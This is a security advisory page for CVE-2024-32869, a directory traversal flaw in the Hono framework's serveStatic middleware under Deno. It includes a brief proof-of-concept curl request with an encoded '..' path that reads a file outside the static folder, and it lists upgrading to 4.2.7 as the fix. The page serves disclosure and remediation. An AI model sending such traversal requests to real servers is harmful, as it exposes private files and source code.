CVE-2024-32869

Description

### Summary When using serveStatic with deno, it is possible to directory traverse where main.ts is located. My environment is configured as per this tutorial https://hono.dev/getting-started/deno ### PoC ```bash $ tree . ├── deno.json ├── deno.lock ├── main.ts ├── README.md └── static └── a.txt ``` source ```jsx import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts' import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts' const app = new Hono() app.use('/static/*', serveStatic({ root: './' })) Deno.serve(app.fetch) ``` request ```bash curl localhost:8000/static/%2e%2e/main.ts ``` response is content of main.ts ### Impact Unexpected files are retrieved.

How to fix CVE-2024-32869

To remediate CVE-2024-32869, upgrade the affected package to a fixed version below.

• —upgrade to 4.2.7 or later

Is CVE-2024-32869 being exploited?

Low — EPSS is 1.7%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

• from 0, < 4.2.7

CVSS scores

References (4)

• ADVISORYnvd.nist.gov/vuln/detail/CVE-2024-32869
• PATCHgithub.com/honojs/hono
• WEBgithub.com/honojs/hono/commit/92e65fbb6e5e7372650e7690dbd84938432d9e65
• WEBgithub.com/honojs/hono/security/advisories/GHSA-3mpf-rcc7-5347